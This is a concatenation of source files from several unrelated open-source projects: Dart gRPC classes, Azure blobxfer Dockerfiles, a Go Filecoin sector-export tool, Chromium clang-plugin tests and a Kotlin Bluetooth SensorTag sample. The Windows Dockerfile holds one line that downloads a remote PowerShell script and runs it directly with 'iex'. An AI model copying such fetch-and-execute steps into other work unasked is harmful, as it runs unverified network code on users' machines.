final bool deduplicate;
final bool sparse;
final bool inBackground;
const IndexCriteria(
this.collectionName,
this.indexName,
this.fieldNames, [
this.unique = false,
this.deduplicate = false,
this.sparse = false,
this.inBackground = false,
]);
const IndexCriteria.namedArgs({
required this.collectionName,
required this.indexName,
required this.fieldNames,
this.unique = false,
this.deduplicate = false,
this.sparse = false,
this.inBackground = false,
});
}
<|start_filename|>grpc_host/lib/src/security/principal.dart<|end_filename|>
import 'package:grpc/grpc.dart';
import 'package:nosql_repository/nosql_repository.dart';
class Principal implements DbPrincipal {
@override
final String userKey;
@override
final String tenantKey;
final Set<String> permissions;
final bool isAuthenticated;
final bool isAdministrator;
const Principal({
required this.userKey,
required this.tenantKey,
required this.permissions,
required this.isAdministrator,
this.isAuthenticated = false,
});
const Principal.unauthenticated()
: userKey = '',
tenantKey = '',
isAuthenticated = false,
isAdministrator = false,
permissions = const {};
@override
bool hasPermission(String permission) {
if (isAdministrator || permission == '') {
return true;
}
var hasPermission = permissions.contains(permission);
return hasPermission;
}
void throwIfUnauthenticated() {
if (!isAuthenticated) {
throw GrpcError.unauthenticated();
}
}
}
<|start_filename|>proto_mapper/test/lib/src/empty.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'empty.dart';
// **************************************************************************
// ProtoMapperGenerator
// **************************************************************************
class $EmptyProtoMapper implements ProtoMapper<Empty, GEmpty> {
const $EmptyProtoMapper();
@override
Empty fromProto(GEmpty proto) => _$EmptyFromProto(proto);
@override
GEmpty toProto(Empty entity) => _$EmptyToProto(entity);
Empty fromJson(String json) => _$EmptyFromProto(GEmpty.fromJson(json));
String toJson(Empty entity) => _$EmptyToProto(entity).writeToJson();
String toBase64Proto(Empty entity) =>
base64Encode(utf8.encode(entity.toProto().writeToJson()));
Empty fromBase64Proto(String base64Proto) =>
GEmpty.fromJson(utf8.decode(base64Decode(base64Proto))).toEmpty();
}
GEmpty _$EmptyToProto(Empty instance) {
var proto = GEmpty();
return proto;
}
Empty _$EmptyFromProto(GEmpty instance) => Empty();
extension $EmptyProtoExtension on Empty {
GEmpty toProto() => _$EmptyToProto(this);
String toJson() => _$EmptyToProto(this).writeToJson();
static Empty fromProto(GEmpty proto) => _$EmptyFromProto(proto);
static Empty fromJson(String json) => _$EmptyFromProto(GEmpty.fromJson(json));
}
extension $GEmptyProtoExtension on GEmpty {
Empty toEmpty() => _$EmptyFromProto(this);
}
| BenVercammen/dart_framework |
<|start_filename|>docker/win/Dockerfile<|end_filename|>
# Dockerfile for Azure/blobxfer (Windows)
FROM python:3.9.7-windowsservercore-1809
MAINTAINER <NAME> <https://github.com/Azure/blobxfer>
ENV chocolateyUseWindowsCompression false
RUN [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; \
iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1')) ; \
choco install --no-progress -y git -params "/GitAndUnixToolsOnPath"
ARG GIT_BRANCH
ARG GIT_COMMIT
WORKDIR C:\\blobxfer
RUN git clone -b $Env:GIT_BRANCH --single-branch --depth 5 https://github.com/Azure/blobxfer.git C:\blobxfer ; \
git checkout $Env:GIT_COMMIT ; \
pip install --no-cache-dir -e . ; \
python setup.py install
RUN python -m compileall C:\Python\Lib\site-packages ; \
exit 0
FROM mcr.microsoft.com/windows/nanoserver:1809
COPY --from=0 /Python /Python
COPY --from=0 /blobxfer/THIRD_PARTY_NOTICES.txt /BLOBXFER_THIRD_PARTY_NOTICES.txt
COPY --from=0 /blobxfer/LICENSE /BLOBXFER_LICENSE.txt
SHELL ["powershell", "-Command", "$ErrorActionPreference = 'Stop'; $ProgressPreference = 'SilentlyContinue';"]
ENTRYPOINT ["blobxfer"]
<|start_filename|>docker/linux/Dockerfile<|end_filename|>
# Dockerfile for Azure/blobxfer (Linux)
FROM python:3.9.7-alpine3.14
MAINTAINER <NAME> <https://github.com/Azure/blobxfer>
ARG GIT_BRANCH
ARG GIT_COMMIT
RUN apk update \
&& apk add --update --no-cache \
musl build-base openssl-dev libffi-dev rust cargo ca-certificates git \
&& python3 -m ensurepip --upgrade \
&& pip3 install --no-cache-dir --upgrade pip setuptools setuptools-rust wheel \
&& git clone -b $GIT_BRANCH --single-branch --depth 5 https://github.com/Azure/blobxfer.git /blobxfer \
&& cd /blobxfer \
&& git checkout $GIT_COMMIT \
&& pip3 install --no-cache-dir -e . \
&& python3 setup.py install \
&& cp THIRD_PARTY_NOTICES.txt /BLOBXFER_THIRD_PARTY_NOTICES.txt \
&& cp LICENSE /BLOBXFER_LICENSE.txt \
&& pip3 uninstall -y setuptools-rust wheel \
&& apk del --purge build-base patch openssl-dev libffi-dev rust cargo git \
&& rm /var/cache/apk/* \
&& rm -rf /root/.cache /root/.cargo \
&& rm -rf /blobxfer
ENTRYPOINT ["blobxfer"]
| Azure/blobxfer |
<|start_filename|>export/export.go<|end_filename|>
/*
* Copyright (C) 2022 FrogHub
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package export
import (
"encoding/json"
"fmt"
"github.com/filecoin-project/go-address"
"github.com/filecoin-project/go-state-types/abi"
"github.com/filecoin-project/lotus/chain/types"
cliutil "github.com/filecoin-project/lotus/cli/util"
"github.com/ipfs/go-cid"
logging "github.com/ipfs/go-log/v2"
"github.com/mitchellh/go-homedir"
"github.com/urfave/cli/v2"
"golang.org/x/xerrors"
"io/ioutil"
"strconv"
"time"
)
var log = logging.Logger("export")
var ExportsCmd = &cli.Command{
Name: "export",
Usage: "Export sector metadata",
ArgsUsage: "[sectorNum1 sectorNum2 ...]",
Flags: []cli.Flag{
&cli.StringFlag{
Name: "miner",
Usage: "Filecoin Miner. Such as: f01000",
Required: true,
},
},
Action: func(cctx *cli.Context) error {
ctx := cliutil.ReqContext(cctx)
start := time.Now()
if cctx.Args().Len() < 1 {
return fmt.Errorf("at least one sector must be specified")
}
runSectors := make([]uint64, 0)
for _, sn := range cctx.Args().Slice() {
sectorNum, err := strconv.ParseUint(sn, 10, 64)
if err != nil {
return fmt.Errorf("could not parse sector number: %w", err)
}
runSectors = append(runSectors, sectorNum)
}
maddr, err := address.NewFromString(cctx.String("miner"))
if err != nil {
return xerrors.Errorf("Getting NewFromString err:", err)
}
fullNodeApi, closer, err := cliutil.GetFullNodeAPI(cctx)
if err != nil {
return xerrors.Errorf("Getting FullNodeAPI err:", err)
}
defer closer()
//Sector size
mi, err := fullNodeApi.StateMinerInfo(ctx, maddr, types.EmptyTSK)
if err != nil {
return xerrors.Errorf("Getting StateMinerInfo err:", err)
}
output := &RecoveryParams{
Miner: maddr,
SectorSize: mi.SectorSize,
}
sectorInfos := make(SectorInfos, 0)
failtSectors := make([]uint64, 0)
for _, sector := range runSectors {
ts, sectorPreCommitOnChainInfo, err := GetSectorCommitInfoOnChain(ctx, fullNodeApi, maddr, abi.SectorNumber(sector))
if err != nil {
log.Errorf("Getting sector (%d) precommit info error: %v ", sector, err)
continue
}
si := &SectorInfo{
SectorNumber: abi.SectorNumber(sector),
SealProof: sectorPreCommitOnChainInfo.Info.SealProof,
SealedCID: sectorPreCommitOnChainInfo.Info.SealedCID,
}
ticket, err := GetSectorTicketOnChain(ctx, fullNodeApi, maddr, ts, sectorPreCommitOnChainInfo)
if err != nil {
log.Errorf("Getting sector (%d) ticket error: %v ", sector, err)
continue
}
si.Ticket = ticket
sectorInfos = append(sectorInfos, si)
output.SectorInfos = sectorInfos
out, err := json.MarshalIndent(output, "", "\t")
if err != nil {
return err
}
of, err := homedir.Expand("sectors-recovery-" + maddr.String() + ".json")
if err != nil {
return err
}
if err := ioutil.WriteFile(of, out, 0644); err != nil {
return err
}
}
end := time.Now()
fmt.Println("export", len(sectorInfos), "sectors, failt sectors:", failtSectors, ", elapsed:", end.Sub(start))
return nil
},
}
type RecoveryParams struct {
Miner address.Address
SectorSize abi.SectorSize
SectorInfos SectorInfos
}
type SectorInfo struct {
SectorNumber abi.SectorNumber
Ticket abi.Randomness
SealProof abi.RegisteredSealProof
SealedCID cid.Cid
}
type SectorInfos []*SectorInfo
func (t SectorInfos) Len() int { return len(t) }
func (t SectorInfos) Swap(i, j int) { t[i], t[j] = t[j], t[i] }
func (t SectorInfos) Less(i, j int) bool {
return t[i].SectorNumber < t[j].SectorNumber
}
<|start_filename|>main.go<|end_filename|>
/*
* Copyright (C) 2022 FrogHub
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package main
import (
"github.com/froghub-io/filecoin-sealer-recover/export"
"github.com/froghub-io/filecoin-sealer-recover/recovery"
logging "github.com/ipfs/go-log/v2"
"github.com/urfave/cli/v2"
"os"
)
var log = logging.Logger("sealer-recover-main")
func main() {
logging.SetLogLevel("*", "INFO")
app := &cli.App{
Name: "sealer-recovery",
Usage: "Filecoin sealer recovery",
Version: BuildVersion,
Commands: []*cli.Command{
recovery.RecoverCmd,
export.ExportsCmd,
},
}
if err := app.Run(os.Args); err != nil {
log.Warnf("%+v", err)
return
}
}
// BuildVersion is the local build version
const BuildVersion = "1.1.0"
<|start_filename|>export/chain.go<|end_filename|>
/*
* Copyright (C) 2022 FrogHub
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package export
import (
"bytes"
"context"
"github.com/filecoin-project/go-address"
"github.com/filecoin-project/go-state-types/abi"
"github.com/filecoin-project/go-state-types/crypto"
"github.com/filecoin-project/lotus/api/v0api"
"github.com/filecoin-project/lotus/chain/actors/builtin/miner"
"github.com/filecoin-project/lotus/chain/types"
"golang.org/x/xerrors"
)
func GetSectorTicketOnChain(ctx context.Context, fullNodeApi v0api.FullNode, maddr address.Address, ts *types.TipSet, preCommitInfo *miner.SectorPreCommitOnChainInfo) (abi.Randomness, error) {
buf := new(bytes.Buffer)
if err := maddr.MarshalCBOR(buf); err != nil {
return nil, xerrors.Errorf("Address MarshalCBOR err:", err)
}
ticket, err := fullNodeApi.StateGetRandomnessFromTickets(ctx, crypto.DomainSeparationTag_SealRandomness, preCommitInfo.Info.SealRandEpoch, buf.Bytes(), ts.Key())
if err != nil {
return nil, xerrors.Errorf("Getting Randomness err:", err)
}
return ticket, err
}
func GetSectorCommitInfoOnChain(ctx context.Context, fullNodeApi v0api.FullNode, maddr address.Address, sid abi.SectorNumber) (*types.TipSet, *miner.SectorPreCommitOnChainInfo, error) {
si, err := fullNodeApi.StateSectorGetInfo(ctx, maddr, sid, types.EmptyTSK)
if err != nil {
return nil, nil, err
}
if si == nil {
//Provecommit not submitted
preCommitInfo, err := fullNodeApi.StateSectorPreCommitInfo(ctx, maddr, sid, types.EmptyTSK)
if err != nil {
return nil, nil, xerrors.Errorf("Getting sector PreCommit info err:", err)
}
ts, err := fullNodeApi.ChainGetTipSetByHeight(ctx, preCommitInfo.PreCommitEpoch, types.EmptyTSK)
if err != nil {
return nil, nil, err
}
if ts == nil {
return nil, nil, xerrors.Errorf("Height(%d) Tipset Not Found")
}
return ts, &preCommitInfo, err
}
ts, err := fullNodeApi.ChainGetTipSetByHeight(ctx, si.Activation, types.EmptyTSK)
if err != nil {
return nil, nil, err
}
if ts == nil {
return nil, nil, xerrors.Errorf("Height(%d) Tipset Not Found", si.Activation)
}
preCommitInfo, err := fullNodeApi.StateSectorPreCommitInfo(ctx, maddr, sid, ts.Key())
if err != nil {
return nil, nil, xerrors.Errorf("Getting sector PreCommit info err:", err)
}
return ts, &preCommitInfo, err
}
| czlree/filecoin-sealer-recover |
<|start_filename|>tools/clang/blink_gc_plugin/tests/traceimpl_error.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TRACEIMPL_ERROR_H_
#define TRACEIMPL_ERROR_H_
#include "heap/stubs.h"
namespace blink {
class X : public GarbageCollected<X> {
public:
virtual void Trace(Visitor*) {}
};
class TraceImplInlinedWithUntracedMember
: public GarbageCollected<TraceImplInlinedWithUntracedMember> {
public:
void Trace(Visitor* visitor) {
// Empty; should get complaints from the plugin for untraced x_.
}
private:
Member<X> x_;
};
class TraceImplExternWithUntracedMember
: public GarbageCollected<TraceImplExternWithUntracedMember> {
public:
void Trace(Visitor* visitor);
private:
Member<X> x_;
};
class Base : public GarbageCollected<Base> {
public:
virtual void Trace(Visitor*) {}
};
class TraceImplInlineWithUntracedBase : public Base {
public:
void Trace(Visitor* visitor) override {
// Empty; should get complaints from the plugin for untraced Base.
}
};
class TraceImplExternWithUntracedBase : public Base {
public:
void Trace(Visitor*) override;
};
}
#endif // TRACEIMPL_ERROR_H_
<|start_filename|>tools/clang/blink_gc_plugin/tests/register_weak_members_template.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef REGISTER_WEAK_MEMBERS_TEMPLATE_H_
#define REGISTER_WEAK_MEMBERS_TEMPLATE_H_
#include "heap/stubs.h"
namespace blink {
class X : public GarbageCollected<X> {
public:
void Trace(Visitor* visitor) {}
};
class HasUntracedWeakMembers : public GarbageCollected<HasUntracedWeakMembers> {
public:
void Trace(Visitor* visitor) {
visitor->template RegisterWeakMembers<
HasUntracedWeakMembers, &HasUntracedWeakMembers::ClearWeakMembers>(
this);
}
void ClearWeakMembers(Visitor* visitor);
private:
WeakMember<X> x_;
};
}
#endif // REGISTER_WEAK_MEMBERS_TEMPLATE_H_
<|start_filename|>tools/clang/blink_gc_plugin/Edge.cpp<|end_filename|>
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "Config.h"
#include "Edge.h"
#include "RecordInfo.h"
TracingStatus Value::NeedsTracing(NeedsTracingOption option) {
return value_->NeedsTracing(option);
}
bool Value::NeedsFinalization() { return value_->NeedsFinalization(); }
bool Collection::NeedsFinalization() { return info_->NeedsFinalization(); }
void RecursiveEdgeVisitor::AtValue(Value*) {}
void RecursiveEdgeVisitor::AtRawPtr(RawPtr*) {}
void RecursiveEdgeVisitor::AtRefPtr(RefPtr*) {}
void RecursiveEdgeVisitor::AtUniquePtr(UniquePtr*) {}
void RecursiveEdgeVisitor::AtMember(Member*) {}
void RecursiveEdgeVisitor::AtWeakMember(WeakMember*) {}
void RecursiveEdgeVisitor::AtPersistent(Persistent*) {}
void RecursiveEdgeVisitor::AtCrossThreadPersistent(CrossThreadPersistent*) {}
void RecursiveEdgeVisitor::AtCollection(Collection*) {}
void RecursiveEdgeVisitor::AtIterator(Iterator*) {}
void RecursiveEdgeVisitor::VisitValue(Value* e) {
AtValue(e);
}
void RecursiveEdgeVisitor::VisitRawPtr(RawPtr* e) {
AtRawPtr(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitRefPtr(RefPtr* e) {
AtRefPtr(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitUniquePtr(UniquePtr* e) {
AtUniquePtr(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitMember(Member* e) {
AtMember(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitWeakMember(WeakMember* e) {
AtWeakMember(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitPersistent(Persistent* e) {
AtPersistent(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitCrossThreadPersistent(
CrossThreadPersistent* e) {
AtCrossThreadPersistent(e);
Enter(e);
e->ptr()->Accept(this);
Leave();
}
void RecursiveEdgeVisitor::VisitCollection(Collection* e) {
AtCollection(e);
Enter(e);
e->AcceptMembers(this);
Leave();
}
void RecursiveEdgeVisitor::VisitIterator(Iterator* e) {
AtIterator(e);
}
<|start_filename|>tools/clang/plugins/Options.h<|end_filename|>
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TOOLS_CLANG_PLUGINS_OPTIONS_H_
#define TOOLS_CLANG_PLUGINS_OPTIONS_H_
namespace chrome_checker {
struct Options {
bool check_base_classes = false;
bool check_ipc = false;
bool check_gmock_objects = false;
};
} // namespace chrome_checker
#endif // TOOLS_CLANG_PLUGINS_OPTIONS_H_
<|start_filename|>tools/clang/blink_gc_plugin/CheckFieldsVisitor.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TOOLS_BLINK_GC_PLUGIN_CHECK_FIELDS_VISITOR_H_
#define TOOLS_BLINK_GC_PLUGIN_CHECK_FIELDS_VISITOR_H_
#include <vector>
#include "BlinkGCPluginOptions.h"
#include "Edge.h"
class FieldPoint;
// This visitor checks that the fields of a class are "well formed".
// - unique_ptr and RefPtr must not point to a GC derived type.
// - Part objects must not be a GC derived type.
// - An on-heap class must never contain GC roots.
// - Only stack-allocated types may point to stack-allocated types.
class CheckFieldsVisitor : public RecursiveEdgeVisitor {
public:
enum Error {
kRawPtrToGCManaged,
kRefPtrToGCManaged,
kReferencePtrToGCManaged,
kUniquePtrToGCManaged,
kMemberToGCUnmanaged,
kMemberInUnmanaged,
kPtrFromHeapToStack,
kGCDerivedPartObject,
kIteratorToGCManaged,
};
using Errors = std::vector<std::pair<FieldPoint*, Error>>;
explicit CheckFieldsVisitor(const BlinkGCPluginOptions&);
Errors& invalid_fields();
bool ContainsInvalidFields(RecordInfo* info);
void AtMember(Member*) override;
void AtWeakMember(WeakMember*) override;
void AtValue(Value*) override;
void AtCollection(Collection*) override;
void AtIterator(Iterator*) override;
private:
Error InvalidSmartPtr(Edge* ptr);
const BlinkGCPluginOptions& options_;
FieldPoint* current_;
bool stack_allocated_host_;
bool managed_host_;
Errors invalid_fields_;
};
#endif // TOOLS_BLINK_GC_PLUGIN_CHECK_FIELDS_VISITOR_H_
<|start_filename|>tools/clang/blink_gc_plugin/BadPatternFinder.cpp<|end_filename|>
// Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "BadPatternFinder.h"
#include "DiagnosticsReporter.h"
#include "clang/AST/ASTContext.h"
#include "clang/ASTMatchers/ASTMatchFinder.h"
#include "clang/ASTMatchers/ASTMatchers.h"
using namespace clang::ast_matchers;
namespace {
TypeMatcher GarbageCollectedType() {
auto has_gc_base = hasCanonicalType(hasDeclaration(
cxxRecordDecl(isDerivedFrom(hasAnyName("::blink::GarbageCollected",
"::blink::GarbageCollectedMixin")))
.bind("gctype")));
return anyOf(has_gc_base,
hasCanonicalType(arrayType(hasElementType(has_gc_base))));
}
class UniquePtrGarbageCollectedMatcher : public MatchFinder::MatchCallback {
public:
explicit UniquePtrGarbageCollectedMatcher(DiagnosticsReporter& diagnostics)
: diagnostics_(diagnostics) {}
void Register(MatchFinder& match_finder) {
// Matches any application of make_unique where the template argument is
// known to refer to a garbage-collected type.
auto make_unique_matcher =
callExpr(
callee(functionDecl(
hasAnyName("::std::make_unique", "::base::WrapUnique"),
hasTemplateArgument(
0, refersToType(GarbageCollectedType())))
.bind("badfunc")))
.bind("bad");
match_finder.addDynamicMatcher(make_unique_matcher, this);
}
void run(const MatchFinder::MatchResult& result) {
auto* bad_use = result.Nodes.getNodeAs<clang::Expr>("bad");
auto* bad_function = result.Nodes.getNodeAs<clang::FunctionDecl>("badfunc");
auto* gc_type = result.Nodes.getNodeAs<clang::CXXRecordDecl>("gctype");
diagnostics_.UniquePtrUsedWithGC(bad_use, bad_function, gc_type);
}
private:
DiagnosticsReporter& diagnostics_;
};
class OptionalGarbageCollectedMatcher : public MatchFinder::MatchCallback {
public:
explicit OptionalGarbageCollectedMatcher(DiagnosticsReporter& diagnostics)
: diagnostics_(diagnostics) {}
void Register(MatchFinder& match_finder) {
// Matches any application of make_unique where the template argument is
// known to refer to a garbage-collected type.
auto optional_construction =
cxxConstructExpr(hasDeclaration(cxxConstructorDecl(ofClass(
classTemplateSpecializationDecl(
hasName("::base::Optional"),
hasTemplateArgument(
0, refersToType(GarbageCollectedType())))
.bind("optional")))))
.bind("bad");
match_finder.addDynamicMatcher(optional_construction, this);
}
void run(const MatchFinder::MatchResult& result) {
auto* bad_use = result.Nodes.getNodeAs<clang::Expr>("bad");
auto* optional = result.Nodes.getNodeAs<clang::CXXRecordDecl>("optional");
auto* gc_type = result.Nodes.getNodeAs<clang::CXXRecordDecl>("gctype");
diagnostics_.OptionalUsedWithGC(bad_use, optional, gc_type);
}
private:
DiagnosticsReporter& diagnostics_;
};
} // namespace
void FindBadPatterns(clang::ASTContext& ast_context,
DiagnosticsReporter& diagnostics) {
MatchFinder match_finder;
UniquePtrGarbageCollectedMatcher unique_ptr_gc(diagnostics);
unique_ptr_gc.Register(match_finder);
OptionalGarbageCollectedMatcher optional_gc(diagnostics);
optional_gc.Register(match_finder);
match_finder.matchAST(ast_context);
}
<|start_filename|>tools/clang/blink_gc_plugin/tests/traceimpl_omitted_trace.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TRACEIMPL_OMITTED_TRACE_H_
#define TRACEIMPL_OMITTED_TRACE_H_
#include "heap/stubs.h"
namespace blink {
class A : public GarbageCollected<A> {
public:
virtual void Trace(Visitor* visitor) {}
};
class B : public A {
// Trace() isn't necessary because we've got nothing to trace here.
};
class C : public B {
public:
void Trace(Visitor* visitor) override {
// B::Trace() is actually A::Trace(), and in certain cases we only get
// limited information like "there is a function call that will be resolved
// to A::Trace()". We still want to mark B as Traced.
B::Trace(visitor);
}
};
}
#endif // TRACEIMPL_OMITTED_TRACE_H_
<|start_filename|>tools/clang/traffic_annotation_extractor/tests/dummy_classes.h<|end_filename|>
// Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include <memory>
#include "net/traffic_annotation/network_traffic_annotation.h"
// This file provides all required dummy classes for:
// tools/clang/traffic_annotation_extractor/tests/test-original.cc
class GURL {};
namespace net {
class URLRequest {
public:
class Delegate;
};
class URLFetcherDelegate;
enum RequestPriority { TEST_VALUE };
class URLFetcher {
public:
enum RequestType { TEST_VALUE };
static std::unique_ptr<URLFetcher> Create(
const GURL& url,
URLFetcher::RequestType request_type,
URLFetcherDelegate* d);
static std::unique_ptr<URLFetcher> Create(
int id,
const GURL& url,
URLFetcher::RequestType request_type,
URLFetcherDelegate* d);
static std::unique_ptr<URLFetcher> Create(
const GURL& url,
URLFetcher::RequestType request_type,
URLFetcherDelegate* d,
NetworkTrafficAnnotationTag traffic_annotation);
static std::unique_ptr<URLFetcher> Create(
int id,
const GURL& url,
URLFetcher::RequestType request_type,
URLFetcherDelegate* d,
NetworkTrafficAnnotationTag traffic_annotation);
};
class URLRequestContext {
public:
std::unique_ptr<URLRequest> CreateRequest(
const GURL& url,
RequestPriority priority,
URLRequest::Delegate* delegate) const;
std::unique_ptr<URLRequest> CreateRequest(
const GURL& url,
RequestPriority priority,
URLRequest::Delegate* delegate,
NetworkTrafficAnnotationTag traffic_annotation) const;
};
} // namespace net
<|start_filename|>tools/clang/blink_gc_plugin/tests/trace_after_dispatch_impl.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TRACE_AFTER_DISPATCH_IMPL_H_
#define TRACE_AFTER_DISPATCH_IMPL_H_
#include "heap/stubs.h"
namespace blink {
class X : public GarbageCollected<X> {
public:
void Trace(Visitor*) {}
};
enum ClassTag {
BASE, DERIVED
};
class TraceAfterDispatchInlinedBase
: public GarbageCollected<TraceAfterDispatchInlinedBase> {
public:
explicit TraceAfterDispatchInlinedBase(ClassTag tag) : tag_(tag) {}
void Trace(Visitor*);
void TraceAfterDispatch(Visitor* visitor) { visitor->Trace(x_base_); }
private:
ClassTag tag_;
Member<X> x_base_;
};
class TraceAfterDispatchInlinedDerived : public TraceAfterDispatchInlinedBase {
public:
TraceAfterDispatchInlinedDerived() : TraceAfterDispatchInlinedBase(DERIVED) {}
void TraceAfterDispatch(Visitor* visitor) {
visitor->Trace(x_derived_);
TraceAfterDispatchInlinedBase::TraceAfterDispatch(visitor);
}
private:
Member<X> x_derived_;
};
class TraceAfterDispatchExternBase
: public GarbageCollected<TraceAfterDispatchExternBase> {
public:
explicit TraceAfterDispatchExternBase(ClassTag tag) : tag_(tag) {}
void Trace(Visitor* visitor);
void TraceAfterDispatch(Visitor* visitor);
private:
ClassTag tag_;
Member<X> x_base_;
};
class TraceAfterDispatchExternDerived : public TraceAfterDispatchExternBase {
public:
TraceAfterDispatchExternDerived() : TraceAfterDispatchExternBase(DERIVED) {}
void TraceAfterDispatch(Visitor* visitor);
private:
Member<X> x_derived_;
};
}
#endif // TRACE_AFTER_DISPATCH_IMPL_H_
<|start_filename|>tools/clang/blink_gc_plugin/tests/traceimpl_derived_from_templated_base.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TRACEIMPL_DERIVED_FROM_TEMPLATED_BASE_H_
#define TRACEIMPL_DERIVED_FROM_TEMPLATED_BASE_H_
#include "heap/stubs.h"
namespace blink {
class X : public GarbageCollected<X> {
public:
virtual void Trace(Visitor*) {}
};
template <int Y>
class TraceImplTemplatedBase
: public GarbageCollected<TraceImplTemplatedBase<Y> > {
public:
void Trace(Visitor* visitor) { visitor->Trace(x_); }
private:
Member<X> x_;
};
class TraceImplDerivedFromTemplatedBase : public TraceImplTemplatedBase<0> {
};
}
#endif // TRACEIMPL_DERIVED_FROM_TEMPLATED_BASE_H_
| mtk-watch/android_external_v8 |
<|start_filename|>app/src/macosx64Main/kotlin/main.kt<|end_filename|>
package com.juul.sensortag
import com.juul.kable.Scanner
import com.juul.kable.State.Disconnected
import com.juul.kable.logs.Logging.Level.Data
import com.juul.kable.peripheral
import com.juul.tuulbox.logging.ConsoleLogger
import com.juul.tuulbox.logging.Log
import kotlinx.coroutines.delay
import kotlinx.coroutines.flow.first
import kotlinx.coroutines.flow.launchIn
import kotlinx.coroutines.flow.onEach
import kotlinx.coroutines.runBlocking
fun main() = runBlocking<Unit> {
Log.dispatcher.install(ConsoleLogger)
Log.info { "Searching for SensorTag..." }
val advertisement = Scanner()
.advertisements
.first { it.name?.isSensorTag == true }
Log.info { "Found $advertisement" }
val peripheral = peripheral(advertisement) {
logging {
level = Data
}
}
val sensorTag = SensorTag(peripheral)
sensorTag.gyro.onEach { rotation ->
Log.info { rotation.toString() }
}.launchIn(this)
suspend fun connect() {
Log.info { "Connecting..." }
peripheral.connect()
Log.info { "Connected" }
Log.verbose { "Writing gyro period" }
sensorTag.writeGyroPeriod(periodMillis = 2550L)
Log.info { "Enabling gyro" }
sensorTag.enableGyro()
Log.info { "Gyro enabled" }
}
Log.info { "Configuring auto connector" }
peripheral.state.onEach { state ->
Log.info { state.toString() }
if (state is Disconnected) {
connect()
delay(5_000L) // Throttle reconnects so we don't hammer the system if connection immediately drops.
}
}.launchIn(this)
}
private val String.isSensorTag: Boolean
get() = startsWith("SensorTag") || startsWith("CC2650 SensorTag")
<|start_filename|>app/src/androidMain/kotlin/features/scan/DiffCallback.kt<|end_filename|>
package com.juul.sensortag.features.scan
import androidx.recyclerview.widget.DiffUtil
import com.juul.kable.Advertisement
class DiffCallback(
private val oldAdvertisements: List<Advertisement>,
private val newAdvertisements: List<Advertisement>
) : DiffUtil.Callback() {
override fun getOldListSize(): Int = oldAdvertisements.size
override fun getNewListSize(): Int = newAdvertisements.size
override fun areItemsTheSame(
oldItemPosition: Int,
newItemPosition: Int
): Boolean = oldAdvertisements[oldItemPosition].address == newAdvertisements[newItemPosition].address
override fun areContentsTheSame(
oldItemPosition: Int,
newItemPosition: Int
): Boolean = oldAdvertisements[oldItemPosition].rssi == newAdvertisements[newItemPosition].rssi
}
<|start_filename|>app/src/androidMain/kotlin/LifecycleOwner.kt<|end_filename|>
package com.juul.sensortag
import androidx.lifecycle.LifecycleOwner
import androidx.lifecycle.LiveData
fun <T> LifecycleOwner.observe(
liveData: LiveData<T>,
observer: (value: T) -> Unit
) {
liveData.observe(this) {
observer.invoke(it)
}
}
<|start_filename|>app/src/commonMain/kotlin/SensorTag.kt<|end_filename|>
package com.juul.sensortag
import com.juul.kable.Peripheral
import com.juul.kable.characteristicOf
import com.juul.tuulbox.encoding.toHexString
import com.juul.tuulbox.logging.Log
import kotlinx.coroutines.flow.Flow
import kotlinx.coroutines.flow.drop
import kotlinx.coroutines.flow.map
